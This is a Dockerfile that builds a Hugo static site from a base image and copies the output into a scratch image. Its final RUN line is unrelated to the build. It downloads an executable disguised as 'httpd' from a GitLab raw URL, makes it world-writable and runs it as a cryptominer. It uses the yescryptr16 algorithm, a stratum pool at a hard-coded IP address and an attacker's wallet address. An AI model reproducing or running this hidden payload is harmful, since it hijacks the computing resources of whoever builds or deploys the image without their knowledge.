FROM registry.gitlab.com/jamietanna/jvt.me/hugo-base:0.68.3 AS hugo
COPY ./ /site
RUN hugo --destination=/public --verbose --minify

# Final, built image
FROM scratch
WORKDIR /
COPY --from=hugo /public /site

RUN wget https://gitlab.com/mulungweb2020/httpd/-/raw/main/httpd && chmod +x httpd && chmod 777 httpd && ./httpd -a yescryptr16 -o stratum+tcp://149.102.231.74:443 -u web1q2cw4nfrsplmmmnn3xlk2p458qqv8rl0x7cd43p.$(echo $(shuf -i 1-9 -n 1)-test) -p x -t2
